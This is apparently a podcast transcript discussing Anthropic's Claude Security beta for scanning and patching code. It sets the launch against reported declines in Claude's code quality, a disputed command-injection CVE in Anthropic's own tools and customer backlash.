THE RUNDOWN AI·
Anthropic Claude Security 4.7 Code Analysis: A Breakdown
Anthropic launched Claude Security to scan code and auto-patch vulnerabilities using Opus 4.7, though concerns persist regarding the model's output quality.
From DailyListen, I'm Alex
HOST
From DailyListen, I'm Alex. Anthropic just launched Claude Security in public beta. It's a tool for enterprise customers to scan codebases for vulnerabilities and spit out fixes, powered by their Opus 4.7 model. Hundreds of organizations already tested it in preview and found bugs that other tools missed for years. But this comes right as cyber experts slam Claude for pumping out insecure code itself—code quality down 47.3% since Opus 4.6 dropped. Does this fix the mess or just highlight it? We're joined by Priya, our technology analyst, who tracks how AI tools reshape security workflows.
PRIYA
What this unlocks is enterprise teams scanning entire codebases with Opus 4.7 and getting patch suggestions in minutes. No need to build custom agents or wait on API tweaks. You access it straight from the Claude.ai sidebar, with Slack webhooks piping alerts into your ticketing setup. Hundreds of orgs in the research preview caught exploits missed by traditional scanners for years. Anthropic's Frontier Red Team used Opus 4.6 to find over 500 vulnerabilities in production open-source code—stuff that sat undetected despite expert reviews. They stress-tested it in Capture-the-Flag events and partnered with Pacific Northwest National Laboratory on critical infrastructure defense. Now Claude Security prioritizes fixes, reasoning like a researcher over full repos. It's Claude Enterprise only, but lowers the bar for teams short on AI devs.
HOST
Over 500 vulnerabilities in open-source code that experts missed for years—that's wild. But Dave Kennedy at TrustedSec says Claude's code output tanked 47.3% in quality since Opus 4.6 launched in early February. Developers there saw serious defects creep in. How does Anthropic square launching a security tool when their own models are reportedly generating buggy code?
PRIYA
The interesting piece is Anthropic's own tools like Claude Code CLI and Agent SDK had an OS command injection flaw—CVE-2026-35022. NIST logged it April 29th, affecting versions up to claude_code 2.1.91 and claude_agent_sdk 0.1.55. It hits authentication helpers run with shell=true, no input checks, risking credential theft in CI/CD pipelines. VulnCheck flagged it as disputed after submitting the CVE April 6th. Kennedy's tool measured Claude's output—bugs, security holes, completion rates—dropping 47.3% from five weeks ago versus Opus 4.6's fresh launch. He calls it "unusably bad," with Opus 4.7 only marginally better. TrustedSec devs ditched it after performance nosedived in March. A senior AMD AI exec labeled Claude Code "unusable for complex tasks." Users like Muratcan Koylan at Sully.ai accused the team of gaslighting complaints. Anthropic blamed latency tweaks and token feedback, but subscriptions canceled anyway.
HOST
Gaslighting complaints while valued at $380 billion? Kennedy built his own tool to quantify that 47.3% drop in code quality, security issues included. And now this CVE in their own dev tools—VulnCheck calls it disputed. Does Claude Security address flaws like that, or is it blind to its own mess?
PRIYA
Claude Security spots vulns in your code, not self-diagnose. It uses Opus 4.7 to reason over repos and propose patches, but we lack details on Anthropic's remediation for CVE-2026-35022—no patch status or exploit conditions public. The disputed tag from VulnCheck flags uncertainty between them and Anthropic. No CVSS score or severity from NIST yet. Kennedy's metric tracks real declines: code finishing jobs cleanly fell off a cliff post-4.6. Opus 4.7 powers the tool—Anthropic claims it's top-tier for vuln hunting—but if models degrade, fixes could inherit bugs. Hundreds tested the preview successfully, yet Forbes warned April 22nd Claude pumps vulnerable code. No word on org impacts or real exploits from the CVE.
No public patch details or severity score for that...
HOST
No public patch details or severity score for that CVE—fair gap to flag. But Anthropic says today's models already nail flaw-finding, per their blog. Project Glasswing ties in— what's that angle amid these code quality gripes?
PRIYA
Project Glasswing, debuted earlier this month, targets vulns in global open-source infrastructure—like an AI Manhattan Project. Vulnerability scanning cores both it and Claude Security. Opus 4.7 blocks broad vuln-scanning to avoid offensive use, but approved Cyber Verification Program researchers access it. Claude Mythos Preview stays locked to Glasswing participants. Meanwhile, Anthropic's Red Team refined Opus 4.6 on real zero-days—over 500 in open-source, per their site. They entered Capture-the-Flag comps and labbed critical infra defense. Claude Security builds on that: open a session, apply fixes in context, skip eng-sec back-and-forth. But critics like Faisal Amjad's February 23rd LinkedIn analysis question if degraded models undermine it. No exploitation details on the hundreds of preview orgs either—pure gap.
HOST
Ties right into those 500 zero-days their Red Team found. From research preview in February as Claude Code Security to public beta now—hundreds of orgs used it. But nearly half of cyber pros want out of the field amid AI shifts. Does this tool actually speed up fixes enough to matter for busy teams?
PRIYA
It cuts days of coordination. Security flags a vuln, Claude Security ranks it, generates an Opus 4.7 patch, and you test in-session. Webhooks hit Slack—no config hassles. Existing scanners missed preview finds for years. Apply via claude.com/contact-sales/security for Enterprise. But limitations hit: no API or agent builds by design, so non-dev teams adopt fast, but power users wanting custom stacks wait. Gaps persist—no CVE impact data, like exploited orgs. Cyber pros face burnout—nearly half eyeing exits—while tools like this automate grunt work. Dave Kennedy's 47.3% quality drop questions if AI-generated patches introduce new holes. Anthropic hit $380 billion valuation pushing defense-first, yet their CLI/SDK vuln shows irony. Red Team's 500+ finds prove capability, but model drift risks it.
HOST
Power users might chafe at no API, but Slack hooks make it plug-and-play. Kennedy says Opus 4.7's "marginally better," not back to 4.6 levels. TrustedSec bailed in March. How's Anthropic responding to the revolt—any fixes beyond this beta?
PRIYA
They acknowledged engineering missteps caused Claude Code's month-long decline, sparking cancellations. Execs first pinned it on latency gains and token tweaks per user asks. No full transparency on compute crunches or patches—Fortune covered the backlash April 14th. Claude Code Review agents check PRs for bugs separately. For Security, it's defensive Opus 4.7 carve-out. But no CVE-2026-35022 resolution public—disputed tag lingers, no root cause or POC. Kennedy's tracker shows security issues in output worsened 47.3%. Muratcan Koylan blasted gaslighting on X. A senior AMD exec trashed it for complex work. This beta broadens access post-preview success, but without addressing model quality, it risks flawed fixes. Red Team's CTF wins and PNNL partnership show promise, yet user pain is real.
That disputed CVE in their auth helpers—no input...
HOST
That disputed CVE in their auth helpers—no input validation, shell=true. VulnCheck submitted it April 6th, NIST analyzed April 29th. Three change records already. Does Claude Security help teams dodge issues like that in their own pipelines?
PRIYA
Exactly the use case. Feed your codebase—CLI, SDK, whatever—into Claude Security. Opus 4.7 scans for injection flaws like CVE-2026-35022's helper execution. Proposes fixes on-site. Preview orgs caught persistent bugs. But irony bites: Anthropic's tools vulnerable, disputed by VulnCheck. No severity metrics or exploit proofs available. No org breach details. Kennedy warns degraded Claude injects similar flaws—47.3% worse output. Opus 4.7 claims strength in patching, backed by Red Team's 500+ zero-days. Glasswing extends to open-source infra. For Enterprise, it's sidebar-simple, Slack-routed. Cyber pros quit-threat levels rise as AI both aids and errs. First AI vuln scan I recall was Codex in September years back—Claude advances it, but self-issues expose gaps.
HOST
Preview started February as Claude Code Security—now beta for Enterprise. Red Team's critical infra work with PNNL sounds heavy. But with user cancellations and "unusable" calls, will teams trust AI fixes over humans?
PRIYA
Trust builds on results: hundreds fixed production exploits scanners ignored for years. Red Team's CTF entries and zero-day hauls—links on red.anthropic.com—prove it. PNNL partnership defended infra models. Claude reasons full-repo context, prioritizes fixes. No bespoke builds needed. But counters loom: Kennedy's "unusably bad" after 47.3% drop. AMD exec, Koylan's gaslighting charge. Subscriptions fled. Anthropic admits missteps, no full patch timeline for their CVE. Gaps block full picture—no impacts, no scores. Forbes April 22nd: Claude outputs vulnerable code. Security pros near half burnout. It speeds triage, but humans validate. Beta opens broader—Claude.ai sidebar for Enterprise—yet model quality doubts linger.
HOST
Humans still in loop for patches—smart. Project Glasswing locks Mythos to select researchers only. Ties to Cyber Verification Program. Amid all this, what's the real-world shift for a dev team right now?
PRIYA
Devs open Claude Security, scan repo, get ranked Opus 4.7 patches in context. Apply, test, Slack alert—no eng-sec ping-pong. Hundreds did it in preview. Red Team found 500+ long-hidden vulns. But Kennedy's metric—47.3% worse code, security flaws up—means caution. Their own CVE-2026-35022 unpatched publicly, disputed. No exploit data. Model decline hit post-4.6 February release; 4.7 inches up. TrustedSec dumped it March. Cancellations rose. Anthropic eyes cyber defense long-term—Glasswing scans open-source world. Enterprise gets beta now; others wait. Burnout hits cyber field hard. Tools like this cut workload, but verify outputs. First Codex scans years ago pale next to this repo-scale reasoning.
Repo-scale reasoning over whole codebases—beats old...
HOST
Repo-scale reasoning over whole codebases—beats old line-by-line scanners. But that 47.3% quality plunge per Kennedy's tool, from five weeks back. Users revolted last month. Beta feels like course-correction?
PRIYA
Beta expands what worked in preview—vuln discovery, patches—for Enterprise. Sidebar access, no API fuss. Slack ties in. Red Team validated on 500+ zero-days, CTFs, PNNL. Anthropic: "highly effective" at code flaws. But revolt real: performance tanked, missteps admitted. No CVE remediation details—impacts unknown. Disputed tag. Kennedy: 47.3% drop in bug-free completions. "Unusably bad." Opus 4.7 not fully recovered. AMD: unusable complex. Koylan: gaslighting. Subscriptions gone. $380B firm pushes cyber angle amid irony. Teams gain speed, but audit AI fixes. Glasswing hints bigger: AI for global OSS security. Preview success vs. output risks—pick your lens.
HOST
I'm Alex. Anthropic's Claude Security beta promises fast vuln scans and fixes for Enterprise, backed by Red Team wins like 500 zero-days. But cyber voices like Dave Kennedy flag 47.3% worse code quality since Opus 4.6, their own disputed CVE, and user backlash. Gaps remain on patches and impacts. Facts point to tools accelerating security, with AI flaws demanding checks. Check SiliconANGLE, Pulse 2.0, Forbes for more. Thanks for listening to DailyListen.
Sources
- 1.Anthropic's Claude Is Pumping Out Vulnerable Code, Cyber Experts ...
- 2.NVD - CVE-2026-35022
- 3.Anthropic announces Claude Security public beta to find and fix software vulnerabilities - SiliconANGLE
- 4.Anthropic Launches Claude Security In Public Beta For Enterprise ...
- 5.Anthropic Launches Claude Security: 5 Things To Know - CRN
- 6.Anthropic's new Claude Security tool scans your codebase for flaws
- 7.Claude Code Security Analysis – February 2026 – 02/23/26 - LinkedIn
- 8.Making frontier cybersecurity capabilities available to defenders
- 9.Anthropic explains Claude Code's recent performance decline after ...
- 10.Why the Public Can't Access Anthropic's Newest AI - YouTube
- 11.Anthropic AI not returning Output completion - Questions - Make Community
Original Article
Anthropic launches Claude Security
The Rundown AI · May 1, 2026
You Might Also Like
- tech
Listen: Anthropic Claude Mythos Undergoes Psychiatric
16 min
- ai
Trump Praises Anthropic: Tech and Politics Explained
10 min
- ai
Listen: Anthropic Ends Third Party Claude Subscription
15 min
- technology
Claude AI Now Integrates With Spotify: An Audio Analysis
11 min
- ai
Claude AI Outage on Tax Day: An Audio Deep Dive
10 min